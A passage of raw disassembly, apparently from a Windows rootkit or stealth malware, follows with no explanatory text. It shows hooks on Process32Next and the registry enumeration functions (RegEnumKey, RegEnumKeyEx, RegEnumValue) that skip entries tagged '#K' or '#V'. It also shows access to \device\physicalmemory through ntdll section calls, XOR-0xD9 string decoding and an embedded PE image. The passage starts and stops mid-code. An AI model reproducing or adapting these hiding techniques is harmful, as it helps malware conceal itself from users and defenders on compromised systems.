ebx cmp ebx, 20h jnz short loc_41A8FD push esp call near ptr 0C4DB524h add esp, 24h test ax, ax jnz short loc_41A923 popa jmp short loc_41A936 ; --------------------------------------------------------------------------- loc_41A923: ; CODE XREF: .data:0041A91Ej popa mov eax, [ebx] test eax, eax jnz short loc_41A932 mov dword ptr [esi], 0 jmp short loc_41A936 ; --------------------------------------------------------------------------- loc_41A932: ; CODE XREF: .data:0041A928j add [esi], eax jmp short loc_41A8ED ; --------------------------------------------------------------------------- loc_41A936: ; CODE XREF: .data:0041A921j ; .data:0041A930j mov eax, [ebx] test eax, eax jz short loc_41A8CD jmp short loc_41A8EB ; --------------------------------------------------------------------------- dw 0FFFFh dd 0FFFFFFh aProcess32next db 'Process32Next',0 ; DATA XREF: .data:off_41ADB0o word_41A952 dw 8360h ; DATA XREF: .data:off_41ADB8o dd 46A08C5h, 0B0BE855h, 0C0850B0Bh, 0EB610374h, 458B610Bh dd 1013D08h, 14740101h, 80808E8h, 1FF8108h, 74010101h dd 1013D07h, 5750101h, 20202E9h db 2 ; --------------------------------------------------------------------------- push ebp mov ebp, esp sub esp, 18h mov [esp+8], edi mov [esp+4], esi mov [esp], ebx loc_41A99A: ; CODE XREF: .data:0041A9E8j sub esp, 8 mov ebx, [ebp+0Ch] mov edi, [ebp+8] mov [esp+4], ebx mov [esp], edi call near ptr 243ABB1h test eax, eax jz short loc_41A9EA pusha mov eax, [ebx+8] push 50h sub esp, 20h xor ebx, ebx loc_41A9C1: ; CODE XREF: .data:0041A9D4j bt eax, ebx jb short loc_41A9CC mov byte ptr [esp+ebx], 30h jmp short loc_41A9D0 ; --------------------------------------------------------------------------- loc_41A9CC: ; CODE XREF: .data:0041A9C4j mov byte ptr [esp+ebx], 31h loc_41A9D0: ; CODE XREF: .data:0041A9CAj inc ebx cmp ebx, 20h jnz short loc_41A9C1 push esp call near ptr 0C4DB5E8h add esp, 24h test ax, ax jnz short loc_41A9E7 popa jmp short loc_41A9EA ; --------------------------------------------------------------------------- loc_41A9E7: ; CODE XREF: .data:0041A9E2j popa jmp short loc_41A99A ; --------------------------------------------------------------------------- loc_41A9EA: ; CODE XREF: .data:0041A9B1j ; .data:0041A9E5j mov ebx, [esp] mov esi, [esp+4] mov edi, [esp+8] mov esp, ebp pop ebp retn 8 ; --------------------------------------------------------------------------- db 0FFh dd 0FFFFFFFFh, 67655200h, 6D756E45h, 4179654Bh db 0 ; --------------------------------------------------------------------------- push ebp mov ebp, esp loc_41AA10: ; CODE XREF: .data:0041AA5Dj push dword ptr [ebp+14h] push dword ptr [ebp+10h] push dword ptr [ebp+0Ch] push dword ptr [ebp+8] call near ptr 243AC23h test eax, eax jnz short loc_41AA5F pusha mov eax, [ebp+10h] mov ebx, eax loc_41AA2B: ; CODE XREF: .data:0041AA31j cmp byte ptr [ebx], 0 jz short loc_41AA33 inc ebx jmp short loc_41AA2B ; --------------------------------------------------------------------------- loc_41AA33: ; CODE XREF: .data:0041AA2Ej mov word ptr [ebx], 4B23h inc ebx inc ebx push dword ptr [ebx] mov word ptr [ebx], 0 push ebx push eax call near ptr 0C4DB654h pop ebx pop dword ptr [ebx] mov word ptr [ebx-2], 0 test ax, ax jnz short loc_41AA59 popa jmp short loc_41AA5F ; --------------------------------------------------------------------------- loc_41AA59: ; CODE XREF: .data:0041AA54j popa inc dword ptr [ebp+0Ch] jmp short loc_41AA10 ; --------------------------------------------------------------------------- loc_41AA5F: ; CODE XREF: .data:0041AA23j ; .data:0041AA57j pop ebp retn 10h ; --------------------------------------------------------------------------- db 0FFh dd 0FFFFFFFFh, 67655200h, 6D756E45h, 5779654Bh db 0 ; --------------------------------------------------------------------------- push ebp mov ebp, esp loc_41AA78: ; CODE XREF: .data:0041AACBj push dword ptr [ebp+14h] push dword ptr [ebp+10h] push dword ptr [ebp+0Ch] push dword ptr [ebp+8] call near ptr 243AC8Bh test eax, eax jnz short loc_41AACD pusha mov eax, [ebp+10h] mov ebx, eax loc_41AA93: ; CODE XREF: .data:0041AA9Bj cmp word ptr [ebx], 0 jz short loc_41AA9D inc ebx inc ebx jmp short loc_41AA93 ; --------------------------------------------------------------------------- loc_41AA9D: ; CODE XREF: .data:0041AA97j mov dword ptr [ebx], 4B0023h add ebx, 4 push dword ptr [ebx] mov dword ptr [ebx], 0 push ebx push eax call near ptr 0D4EB7C2h pop ebx pop dword ptr [ebx] mov dword ptr [ebx-4], 0 test ax, ax jnz short loc_41AAC7 popa jmp short loc_41AACD ; --------------------------------------------------------------------------- loc_41AAC7: ; CODE XREF: .data:0041AAC2j popa inc dword ptr [ebp+0Ch] jmp short loc_41AA78 ; --------------------------------------------------------------------------- loc_41AACD: ; CODE XREF: .data:0041AA8Bj ; .data:0041AAC5j pop ebp retn 10h ; --------------------------------------------------------------------------- db 3 dup(0FFh) dword_41AAD4 dd 5200FFFFh, 6E456765h, 654B6D75h, 57784579h db 0 ; --------------------------------------------------------------------------- loc_41AAE5: ; DATA XREF: .data:0041AE18o push ebp mov ebp, esp loc_41AAE8: ; CODE XREF: .data:0041AB63j mov eax, [ebp+14h] push dword ptr [eax] mov eax, [ebp+20h] test eax, eax jz short loc_41AAF6 push dword ptr [eax] loc_41AAF6: ; CODE XREF: .data:0041AAF2j push dword ptr [ebp+24h] push dword ptr [ebp+20h] push dword ptr [ebp+1Ch] push dword ptr [ebp+18h] push dword ptr [ebp+14h] push dword ptr [ebp+10h] push dword ptr [ebp+0Ch] push dword ptr [ebp+8] call near ptr 243AD15h test eax, eax jnz short loc_41AB65 pusha mov eax, [ebp+10h] mov ebx, eax loc_41AB1D: ; CODE XREF: .data:0041AB25j cmp word ptr [ebx], 0 jz short loc_41AB27 inc ebx inc ebx jmp short loc_41AB1D ; --------------------------------------------------------------------------- loc_41AB27: ; CODE XREF: .data:0041AB21j mov dword ptr [ebx], 4B0023h add ebx, 4 push dword ptr [ebx] mov dword ptr [ebx], 0 push ebx push eax call near ptr 0D4EB84Ch pop ebx pop dword ptr [ebx] mov dword ptr [ebx-4], 0 test ax, ax jnz short loc_41AB51 popa jmp short loc_41AB65 ; --------------------------------------------------------------------------- loc_41AB51: ; CODE XREF: .data:0041AB4Cj popa inc dword ptr [ebp+0Ch] mov eax, [ebp+20h] test eax, eax jz short loc_41AB5E pop dword ptr [eax] loc_41AB5E: ; CODE XREF: .data:0041AB5Aj mov eax, [ebp+14h] pop dword ptr [eax] jmp short loc_41AAE8 ; --------------------------------------------------------------------------- loc_41AB65: ; CODE XREF: .data:0041AB15j ; .data:0041AB4Fj add esp, 4 cmp dword ptr [ebp+20h], 0 jz short loc_41AB71 add esp, 4 loc_41AB71: ; CODE XREF: .data:0041AB6Cj pop ebp retn 20h ; --------------------------------------------------------------------------- db 3 dup(0FFh) dd 5200FFFFh, 6E456765h, 654B6D75h, 41784579h db 0 ; --------------------------------------------------------------------------- push ebp mov ebp, esp loc_41AB8C: ; CODE XREF: .data:0041AC01j mov eax, [ebp+14h] push dword ptr [eax] mov eax, [ebp+20h] test eax, eax jz short loc_41AB9A push dword ptr [eax] loc_41AB9A: ; CODE XREF: .data:0041AB96j push dword ptr [ebp+24h] push dword ptr [ebp+20h] push dword ptr [ebp+1Ch] push dword ptr [ebp+18h] push dword ptr [ebp+14h] push dword ptr [ebp+10h] push dword ptr [ebp+0Ch] push dword ptr [ebp+8] call near ptr 243ADB9h test eax, eax jnz short loc_41AC03 pusha mov eax, [ebp+10h] mov ebx, eax loc_41ABC1: ; CODE XREF: .data:0041ABC7j cmp byte ptr [ebx], 0 jz short loc_41ABC9 inc ebx jmp short loc_41ABC1 ; --------------------------------------------------------------------------- loc_41ABC9: ; CODE XREF: .data:0041ABC4j mov word ptr [ebx], 4B23h inc ebx inc ebx push dword ptr [ebx] mov word ptr [ebx], 0 push ebx push eax call near ptr 0C4DB7EAh pop ebx pop dword ptr [ebx] mov word ptr [ebx-2], 0 test ax, ax jnz short loc_41ABEF popa jmp short loc_41AC03 ; --------------------------------------------------------------------------- loc_41ABEF: ; CODE XREF: .data:0041ABEAj popa inc dword ptr [ebp+0Ch] mov eax, [ebp+20h] test eax, eax jz short loc_41ABFC pop dword ptr [eax] loc_41ABFC: ; CODE XREF: .data:0041ABF8j mov eax, [ebp+14h] pop dword ptr [eax] jmp short loc_41AB8C ; --------------------------------------------------------------------------- loc_41AC03: ; CODE XREF: .data:0041ABB9j ; .data:0041ABEDj add esp, 4 cmp dword ptr [ebp+20h], 0 jz short loc_41AC0F add esp, 4 loc_41AC0F: ; CODE XREF: .data:0041AC0Aj pop ebp retn 20h ; --------------------------------------------------------------------------- db 0FFh dword_41AC14 dd 0FFFFFFFFh, 67655200h, 6D756E45h, 756C6156h db 65h, 57h, 0 ; --------------------------------------------------------------------------- loc_41AC27: ; DATA XREF: .data:0041AE38o push ebp mov ebp, esp loc_41AC2A: ; CODE XREF: .data:0041ACA5j mov eax, [ebp+14h] push dword ptr [eax] mov eax, [ebp+24h] test eax, eax jz short loc_41AC38 push dword ptr [eax] loc_41AC38: ; CODE XREF: .data:0041AC34j push dword ptr [ebp+24h] push dword ptr [ebp+20h] push dword ptr [ebp+1Ch] push dword ptr [ebp+18h] push dword ptr [ebp+14h] push dword ptr [ebp+10h] push dword ptr [ebp+0Ch] push dword ptr [ebp+8] call near ptr 243AE57h test eax, eax jnz short loc_41ACA7 pusha mov eax, [ebp+10h] mov ebx, eax loc_41AC5F: ; CODE XREF: .data:0041AC67j cmp word ptr [ebx], 0 jz short loc_41AC69 inc ebx inc ebx jmp short loc_41AC5F ; --------------------------------------------------------------------------- loc_41AC69: ; CODE XREF: .data:0041AC63j mov dword ptr [ebx], 560023h add ebx, 4 push dword ptr [ebx] mov dword ptr [ebx], 0 push ebx push eax call near ptr 0D4EB98Eh pop ebx pop dword ptr [ebx] mov dword ptr [ebx-4], 0 test ax, ax jnz short loc_41AC93 popa jmp short loc_41ACA7 ; --------------------------------------------------------------------------- loc_41AC93: ; CODE XREF: .data:0041AC8Ej popa inc dword ptr [ebp+0Ch] mov eax, [ebp+24h] test eax, eax jz short loc_41ACA0 pop dword ptr [eax] loc_41ACA0: ; CODE XREF: .data:0041AC9Cj mov eax, [ebp+14h] pop dword ptr [eax] jmp short loc_41AC2A ; --------------------------------------------------------------------------- loc_41ACA7: ; CODE XREF: .data:0041AC57j ; .data:0041AC91j add esp, 4 cmp dword ptr [ebp+24h], 0 jz short loc_41ACB3 add esp, 4 loc_41ACB3: ; CODE XREF: .data:0041ACAEj pop ebp retn 20h ; --------------------------------------------------------------------------- db 0FFh dd 0FFFFFFFFh, 67655200h, 6D756E45h, 756C6156h db 65h, 41h, 0 ; --------------------------------------------------------------------------- push ebp mov ebp, esp loc_41ACCE: ; CODE XREF: .data:0041AD43j mov eax, [ebp+14h] push dword ptr [eax] mov eax, [ebp+24h] test eax, eax jz short loc_41ACDC push dword ptr [eax] loc_41ACDC: ; CODE XREF: .data:0041ACD8j push dword ptr [ebp+24h] push dword ptr [ebp+20h] push dword ptr [ebp+1Ch] push dword ptr [ebp+18h] push dword ptr [ebp+14h] push dword ptr [ebp+10h] push dword ptr [ebp+0Ch] push dword ptr [ebp+8] call near ptr 243AEFBh test eax, eax jnz short loc_41AD45 pusha mov eax, [ebp+10h] mov ebx, eax loc_41AD03: ; CODE XREF: .data:0041AD09j cmp byte ptr [ebx], 0 jz short loc_41AD0B inc ebx jmp short loc_41AD03 ; --------------------------------------------------------------------------- loc_41AD0B: ; CODE XREF: .data:0041AD06j mov word ptr [ebx], 5623h inc ebx inc ebx push dword ptr [ebx] mov word ptr [ebx], 0 push ebx push eax call near ptr 0C4DB92Ch pop ebx pop dword ptr [ebx] mov word ptr [ebx-2], 0 test ax, ax jnz short loc_41AD31 popa jmp short loc_41AD45 ; --------------------------------------------------------------------------- loc_41AD31: ; CODE XREF: .data:0041AD2Cj popa inc dword ptr [ebp+0Ch] mov eax, [ebp+24h] test eax, eax jz short loc_41AD3E pop dword ptr [eax] loc_41AD3E: ; CODE XREF: .data:0041AD3Aj mov eax, [ebp+14h] pop dword ptr [eax] jmp short loc_41ACCE ; --------------------------------------------------------------------------- loc_41AD45: ; CODE XREF: .data:0041ACFBj ; .data:0041AD2Fj add esp, 4 cmp dword ptr [ebp+24h], 0 jz short loc_41AD51 add esp, 4 loc_41AD51: ; CODE XREF: .data:0041AD4Cj pop ebp retn 20h ; --------------------------------------------------------------------------- db 3 dup(0FFh) db 2 dup(0FFh), 0 aKernel32_dll db 'kernel32.dll',0 ; DATA XREF: sub_401EAF+2C2o ; .data:off_41ADB4o aNtdll_dll db 'ntdll.dll',0 ; DATA XREF: sub_4019A1+1o ; .data:0041ADC4o ... aAdvapi32_dll db 'advapi32.dll',0 ; DATA XREF: .data:0041AE14o ; .data:0041AE34o aIphlpapi_dll db 'iphlpapi.dll',0 aInetmib1_dll db 'inetmib1.dll',0 aWsock32_dll db 'wsock32.dll',0 aUser32_dll db 'user32.dll',0 off_41ADB0 dd offset aProcess32next ; DATA XREF: sub_401EAF+A9r ; sub_401EAF+E3r ... ; "Process32Next" off_41ADB4 dd offset aKernel32_dll ; DATA XREF: sub_401EAF+84r ; "kernel32.dll" off_41ADB8 dd offset word_41A952 ; DATA XREF: sub_401E23+78r byte_41ADBC db 0 ; DATA XREF: sub_401EAF+49r ; sub_401EAF+66r align 10h dd offset dword_41A874+4 dd offset aNtdll_dll ; "ntdll.dll" dd offset loc_41A891 dd 1, 41A7F1h, 41AD5Bh, 41A7FFh, 1, 41A770h, 41AD5Bh, 41A77Eh dd 2, 41AA69h, 41AD72h, 41AA75h, 1, 41AA01h, 41AD72h, 41AA0Dh dd 0 dd offset dword_41AAD4+3 dd offset aAdvapi32_dll ; "advapi32.dll" dd offset loc_41AAE5 dd 1, 41AB7Bh, 41AD72h, 41AB89h, 0 dd offset dword_41AC14+5 dd offset aAdvapi32_dll ; "advapi32.dll" dd offset loc_41AC27 dd 1, 41ACBDh, 41AD72h, 41ACCBh, 5 dup(0) aRtlinitunicode db 'RtlInitUnicodeString',0 ; DATA XREF: sub_4019A1+Do aNtunmapviewofs db 'NtUnmapViewOfSection',0 ; DATA XREF: sub_4019A1+1Do aNtopensection db 'NtOpenSection',0 ; DATA XREF: sub_4019A1+2Do aNtmapviewofsec db 'NtMapViewOfSection',0 ; DATA XREF: sub_4019A1+3Do aRtlntstatustod db 'RtlNtStatusToDosError',0 ; DATA XREF: sub_4019A1+4Do aCurrent_user db 'CURRENT_USER',0 ; DATA XREF: sub_401A00+4Do align 10h aDevicePhysical: ; DATA XREF: sub_401A00+8o unicode 0, <\device\physicalmemory>,0 aWcscmp db 'wcscmp',0 ; DATA XREF: .data:off_41AF78o aHtons db 'htons',0 aVirtualprotect db 'VirtualProtect',0 aGetcurrentproc db 'GetCurrentProcessId',0 aFindwindowa db 'FindWindowA',0 aSendmessagea db 'SendMessageA',0 aIsbadreadptr db 'IsBadReadPtr',0 aGlobalfindatom db 'GlobalFindAtomA',0 aGlobalfindat_0 db 'GlobalFindAtomW',0 byte_41AF74 db 3 ; DATA XREF: sub_401B3E+68r align 4 off_41AF78 dd offset aWcscmp ; DATA XREF: sub_401B3E+CFr ; sub_401B3E+118r ; "wcscmp" off_41AF7C dd offset aNtdll_dll ; DATA XREF: sub_401B3E+BCr ; "ntdll.dll" dd 5, 41AF05h, 41AD99h, 7, 41AF0Bh, 41AD5Bh, 8, 41AF1Ah dd 41AD5Bh, 9, 41AF2Eh, 41ADA5h, 0Ah, 41AF3Ah, 41ADA5h dd 0Bh, 41AF47h, 41AD5Bh, 0Ch, 41AF54h, 41AD5Bh, 0Dh, 41AF64h dd 41AD5Bh dword_41AFE0 dd 905A4Dh, 3, 4, 0FFFFh, 0B8h, 0 dd 40h, 8 dup(0) dd 80h, 0EBA1F0Eh, 0CD09B400h, 4C01B821h, 685421CDh, 70207369h dd 72676F72h, 63206D61h, 6F6E6E61h, 65622074h, 6E757220h dd 206E6920h, 20534F44h, 65646F6Dh, 0A0D0D2Eh, 24h, 0 dd 4550h, 7014Ch, 427CB50Ah, 2 dup(0) dd 210E00E0h, 3702010Bh, 800h, 0C00h, 1000h, 1190h, 1000h dd 2000h, 10000000h, 1000h, 200h, 1, 0 dd 4, 0 dd 8000h, 400h, 0 dd 2, 100000h, 1000h, 100000h, 1000h, 0 dd 10h, 7000h, 48h, 5000h, 37Ch, 6 dup(0) dd 6000h, 0DCh, 3000h, 54h, 12h dup(0) a_text db '.text',0 align 10h db '¼',7,0 align 4 dd 1000h, 7BCh, 400h, 3 dup(0) dd 60000020h, 7373622Eh, 0 dd 0FE0h, 2000h, 5 dup(0) dd 0C0000080h, 6164722Eh, 6174h, 54h, 3000h, 54h, 0C00h dd 3 dup(0) dd 40000020h, 7461642Eh, 61h, 0C4h, 4000h, 0C4h, 0E00h dd 3 dup(0) dd 0C0000040h, 6164692Eh, 6174h, 37Ch, 5000h, 37Ch, 1000h dd 3 dup(0) dd 0C0000060h, 6C65722Eh, 636Fh, 0E4h, 6000h, 0E4h, 1600h dd 3 dup(0) dd 2000020h, 6164652Eh, 6174h, 48h, 7000h, 48h, 1800h dd 3 dup(0) dd 40000020h, 5Ch dup(0) dd 8B40C031h, 0F704244Ch, 60441h, 0F740000h, 824448Bh dd 1024548Bh, 3B80289h, 0C3000000h ; =============== S U B R O U T I N E ======================================= sub_41B400 proc near ; CODE XREF: .data:0041B528p ; .data:0041B556p var_14 = dword ptr -14h arg_0 = dword ptr 4 arg_4 = dword ptr 8 push ebx push esi push edi mov eax, [esp+0Ch+arg_0] push eax push 0FFFFFFFEh push 10001000h push large dword ptr fs:0 mov large fs:0, esp loc_41B41D: ; CODE XREF: sub_41B400+44j ; sub_41B400+4Aj mov eax, [esp+1Ch+arg_0] mov ebx, [eax+8] mov esi, [eax+0Ch] cmp esi, 0FFFFFFFFh jz short loc_41B44C cmp esi, [esp+1Ch+arg_4] jz short loc_41B44C lea esi, [esi+esi*2] mov ecx, [ebx+esi*4] mov ecx, [esp+1Ch+var_14] mov ecx, [eax+0Ch] cmp dword ptr [ebx+esi*4+4], 0 jnz short loc_41B41D call dword ptr [ebx+esi*4+8] jmp short loc_41B41D ; --------------------------------------------------------------------------- loc_41B44C: ; CODE XREF: sub_41B400+2Aj ; sub_41B400+30j pop large dword ptr fs:0 add esp, 0Ch pop edi pop esi pop ebx retn sub_41B400 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_41B45A proc near ; CODE XREF: .data:0041B51Bp arg_0 = dword ptr 8 push ebp mov ebp, esp push ebx push esi push edi push ebp push 0 push 0 push 10001092h push [ebp+arg_0] call sub_41BAF4 pop ebp pop edi pop esi pop ebx mov esp, ebp pop ebp retn sub_41B45A endp ; --------------------------------------------------------------------------- db 0FCh ; --------------------------------------------------------------------------- push ebp mov ebp, esp sub esp, 8 push ebx push esi push edi push ebp mov ebx, [ebp+0Ch] mov eax, [ebp+8] test dword ptr [eax+4], 6 jnz loc_41B54F mov [ebp-8], eax mov eax, [ebp+10h] mov [ebp-4], eax lea eax, [ebp-8] mov [ebx-4], eax mov esi, [ebx+0Ch] mov edi, [ebx+8] loc_41B4AD: ; CODE XREF: .data:0041B546j cmp esi, 0FFFFFFFFh jz loc_41B55E lea ecx, [esi+esi*2] cmp dword ptr [edi+ecx*4+4], 0 jz short loc_41B53D push esi push ebp lea ebp, [ebx+10h] mov eax, [ebp-14h] mov eax, [eax] mov eax, [eax] mov ds:10004034h, eax mov edx, [ebp-14h] mov eax, [edx] mov ds:10004038h, eax mov eax, [edx+4] mov ds:1000403Ch, eax push esi push edi push ecx mov ecx, 14h lea edi, ds:10004040h mov esi, ds:10004038h rep movsd lea edi, ds:10004040h mov ds:10004038h, edi pop ecx pop edi pop esi call dword ptr [edi+ecx*4+4] pop ebp pop esi mov ebx, [ebp+0Ch] or eax, eax jz short loc_41B53D js short loc_41B54B mov edi, [ebx+8] push ebx call sub_41B45A add esp, 4 lea ebp, [ebx+10h] push esi push ebx call sub_41B400 add esp, 8 lea ecx, [esi+esi*2] mov eax, [edi+ecx*4] mov eax, [ebx+0Ch] call dword ptr [edi+ecx*4+8] loc_41B53D: ; CODE XREF: .data:0041B4BEj ; .data:0041B513j mov edi, [ebx+8] lea ecx, [esi+esi*2] mov esi, [edi+ecx*4] jmp loc_41B4AD ; --------------------------------------------------------------------------- loc_41B54B: ; CODE XREF: .data:0041B515j xor eax, eax jmp short loc_41B568 ; --------------------------------------------------------------------------- loc_41B54F: ; CODE XREF: .data:0041B492j push ebp lea ebp, [ebx+10h] push 0FFFFFFFFh push ebx call sub_41B400 add esp, 0Ch loc_41B55E: ; CODE XREF: .data:0041B4B0j push 0Bh call sub_41BB60 add esp, 4 loc_41B568: ; CODE XREF: .data:0041B54Dj pop ebp pop edi pop esi pop ebx mov esp, ebp pop ebp retn ; --------------------------------------------------------------------------- push ebp mov ebp, esp push ebx push esi push edi cmp dword ptr [ebp+0Ch], 1 jnz short loc_41B581 call sub_41B5A4 loc_41B581: ; CODE XREF: .data:0041B57Aj call sub_41BA53 push dword ptr [ebp+10h] push dword ptr [ebp+0Ch] push dword ptr [ebp+8] mov eax, ds:10004000h call eax pop edi pop esi pop ebx leave retn 0Ch ; --------------------------------------------------------------------------- db 0B8h, 1, 0 dd 0F2EB0000h ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_41B5A4 proc near ; CODE XREF: .data:0041B57Cp var_C = dword ptr -0Ch var_8 = dword ptr -8 var_4 = dword ptr -4 push ebp mov ebp, esp sub esp, 0Ch push edi push 0 push 0FFFFFFF6h call sub_41BB18 mov [ebp+var_8], eax push 0 push 0FFFFFFF5h call sub_41BB18 mov [ebp+var_4], eax push 0 push 0FFFFFFF4h call sub_41BB18 mov [ebp+var_C], eax push 1000401Eh push [ebp+var_8] call sub_41BB0C mov ds:10004008h, eax push 1000401Ch push [ebp+var_4] call sub_41BB0C mov ds:10004004h, eax push 1000401Ch push [ebp+var_C] call sub_41BB0C add esp, 30h mov ds:1000400Ch, eax mov edi, ds:10004004h or edi, edi jz short loc_41B61D push 0 push edi call sub_41BB6C add esp, 8 loc_41B61D: ; CODE XREF: sub_41B5A4+6Cj mov edi, ds:1000400Ch or edi, edi jz short loc_41B637 push 0 push edi call sub_41BB6C add esp, 8 call sub_41B63C loc_41B637: ; CODE XREF: sub_41B5A4+81j pop edi leave retn sub_41B5A4 endp ; --------------------------------------------------------------------------- align 4 ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_41B63C proc near ; CODE XREF: sub_41B5A4+8Ep var_14 = dword ptr -14h var_10 = dword ptr -10h var_C = dword ptr -0Ch var_8 = dword ptr -8 var_4 = dword ptr -4 push ebp mov ebp, esp sub esp, 14h push ebx push esi push edi mov [ebp+var_C], 0 call sub_41BA88 mov ebx, eax mov [ebp+var_10], ebx jmp short loc_41B679 ; --------------------------------------------------------------------------- loc_41B658: ; CODE XREF: sub_41B63C+45j cmp byte ptr ds:0[ebx], 3Dh jz short loc_41B665 inc [ebp+var_C] loc_41B665: ; CODE XREF: sub_41B63C+24j mov edi, ebx xor eax, eax stc sbb ecx, ecx repne scasb neg ecx lea eax, [ecx-2] mov edi, eax inc edi lea ebx, [ebx+edi] loc_41B679: ; CODE XREF: sub_41B63C+1Aj cmp byte ptr ds:0[ebx], 0 jnz short loc_41B658 mov edi, [ebp+var_C] inc edi lea edi, ds:0[edi*4] mov [ebp+var_14], edi push [ebp+var_14] call sub_41BB3C pop ecx mov [ebp+var_8], eax mov ds:10004010h, eax cmp [ebp+var_8], 0 jnz short loc_41B6AC xor eax, eax jmp short loc_41B722 ; --------------------------------------------------------------------------- loc_41B6AC: ; CODE XREF: sub_41B63C+6Aj mov ebx, [ebp+var_10] jmp short loc_41B705 ; --------------------------------------------------------------------------- loc_41B6B1: ; CODE XREF: sub_41B63C+D1j mov edi, ebx xor eax, eax stc sbb ecx, ecx repne scasb neg ecx lea eax, [ecx-2] mov edi, eax inc edi mov [ebp+var_4], edi cmp byte ptr ds:0[ebx], 3Dh jz short loc_41B6FF push [ebp+var_4] call sub_41BB3C pop ecx mov esi, [ebp+var_8] mov ds:0[esi], eax or eax, eax jnz short loc_41B6E8 jmp short loc_41B722 ; --------------------------------------------------------------------------- loc_41B6E8: ; CODE XREF: sub_41B63C+A8j push ebx mov edi, [ebp+var_8] push dword ptr ds:0[edi] call sub_41BB90 add esp, 8 add [ebp+var_8], 4 loc_41B6FF: ; CODE XREF: sub_41B63C+91j mov edx, [ebp+var_4] lea ebx, [ebx+edx] loc_41B705: ; CODE XREF: sub_41B63C+73j cmp byte ptr ds:0[ebx], 0 jnz short loc_41B6B1 mov edx, [ebp+var_8] mov dword ptr ds:0[edx], 0 mov eax, 1 loc_41B722: ; CODE XREF: sub_41B63C+6Ej ; sub_41B63C+AAj pop edi pop esi pop ebx leave retn sub_41B63C endp ; --------------------------------------------------------------------------- align 4 ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_41B728 proc near ; CODE XREF: sub_41B7D2+22p var_C = dword ptr -0Ch var_8 = dword ptr -8 var_4 = dword ptr -4 arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch push ebp mov ebp, esp sub esp, 0Ch push esi push edi mov esi, [ebp+arg_4] mov [ebp+var_4], 181h push esi push [ebp+arg_0] mov eax, ds:10004098h lea eax, ds:10002000h[eax] push eax call sub_41BB48 add esp, 0Ch xor edi, edi jmp short loc_41B771 ; --------------------------------------------------------------------------- loc_41B757: ; CODE XREF: sub_41B728+4Bj mov eax, ds:10004098h add eax, edi lea eax, ds:10002000h[eax] movsx edx, byte ptr [eax] xor edx, 0D9h mov [eax], dl inc edi loc_41B771: ; CODE XREF: sub_41B728+2Dj cmp edi, esi jl short loc_41B757 mov [ebp+var_8], 389h mov eax, ds:10004098h add eax, esi mov byte ptr ds:10002000h[eax], 0 xor edi, edi mov edi, ds:10004098h add dword ptr ds:10004098h, 3 mov eax, ds:10004098h lea eax, [eax+esi+4] mov ds:10004098h, eax inc dword ptr ds:10004098h cmp dword ptr ds:10004098h, 0DB6h jle short loc_41B7C1 and dword ptr ds:10004098h, 0 loc_41B7C1: ; CODE XREF: sub_41B728+90j mov [ebp+var_C], 9Ch lea eax, [edi+10002000h] pop edi pop esi leave retn sub_41B728 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_41B7D2 proc near ; CODE XREF: .data:0041B96Bp var_E = word ptr -0Eh var_C = dword ptr -0Ch var_5 = byte ptr -5 var_4 = dword ptr -4 push ebp mov ebp, esp sub esp, 10h push esi push edi lea edi, [ebp+var_5] lea esi, ds:1000409Ch xor ecx, ecx inc ecx rep movsb call sub_41BAC4 push 5 push 100040BDh call sub_41B728 add esp, 8 push eax push 0 push 1F0001h call sub_41BAE8 mov [ebp+var_4], eax or eax, eax jz short loc_41B82D mov [ebp+var_C], 4FA1h inc [ebp+var_C] push eax call sub_41BAA0 mov [ebp+var_E], 6C6Dh inc [ebp+var_E] xor eax, eax inc eax loc_41B82D: ; CODE XREF: sub_41B7D2+3Cj pop edi pop esi leave retn sub_41B7D2 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_41B831 proc near ; CODE XREF: .data:0041B99Fp var_10A = byte ptr -10Ah var_6 = word ptr -6 var_4 = word ptr -4 var_2 = word ptr -2 arg_0 = dword ptr 8 push ebp mov ebp, esp sub esp, 10Ch push ebx push esi push edi mov edi, [ebp+arg_0] call sub_41BA7C call sub_41BAAC mov ecx, edi or eax, 0FFFFFFFFh loc_41B84F: ; CODE XREF: sub_41B831+23j inc eax cmp byte ptr [ecx+eax], 0 jnz short loc_41B84F mov ebx, eax mov [ebp+var_6], bx mov ax, [ebp+var_6] mov [ebp+var_2], ax jmp short loc_41B884 ; --------------------------------------------------------------------------- loc_41B866: ; CODE XREF: sub_41B831+59j movzx eax, [ebp+var_2] cmp byte ptr [edi+eax], 5Ch jnz short loc_41B880 call sub_41BA70 inc [ebp+var_2] call sub_41BAC4 jmp short loc_41B88C ; --------------------------------------------------------------------------- loc_41B880: ; CODE XREF: sub_41B831+3Dj dec [ebp+var_2] loc_41B884: ; CODE XREF: sub_41B831+33j movzx eax, [ebp+var_2] or eax, eax jg short loc_41B866 loc_41B88C: ; CODE XREF: sub_41B831+4Dj mov ax, [ebp+var_2] cmp ax, [ebp+var_6] jnb short loc_41B8CA mov [ebp+var_4], 0 jmp short loc_41B8B8 ; --------------------------------------------------------------------------- loc_41B89E: ; CODE XREF: sub_41B831+97j movzx eax, [ebp+var_4] movzx edx, [ebp+var_2] mov ecx, eax add ecx, edx mov dl, [edi+ecx] mov [ebp+eax+var_10A], dl inc [ebp+var_4] loc_41B8B8: ; CODE XREF: sub_41B831+6Bj movzx eax, [ebp+var_4] movzx edx, [ebp+var_6] movzx ecx, [ebp+var_2] sub edx, ecx cmp eax, edx jle short loc_41B89E loc_41B8CA: ; CODE XREF: sub_41B831+63j mov esi, 6BBCh add esi, 7D41h lea eax, [ebp+var_10A] push eax call sub_41BADC call sub_41BAD0 pop edi pop esi pop ebx leave retn sub_41B831 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_41B8EB proc near ; CODE XREF: .data:0041B9F2p var_8 = byte ptr -8 arg_0 = dword ptr 8 push ebp mov ebp, esp push ecx push eax push esi push edi call sub_41BA7C push 100040BBh push [ebp+arg_0] call sub_41BB84 add esp, 8 lea edi, [ebp+var_8] lea esi, ds:1000409Dh movsd movsd pop edi pop esi leave retn sub_41B8EB endp ; --------------------------------------------------------------------------- push ebp mov ebp, esp sub esp, 21Ch push esi push edi mov ax, ds:100040A5h mov [ebp-217h], ax mov eax, ds:10004094h add eax, 698h push eax call 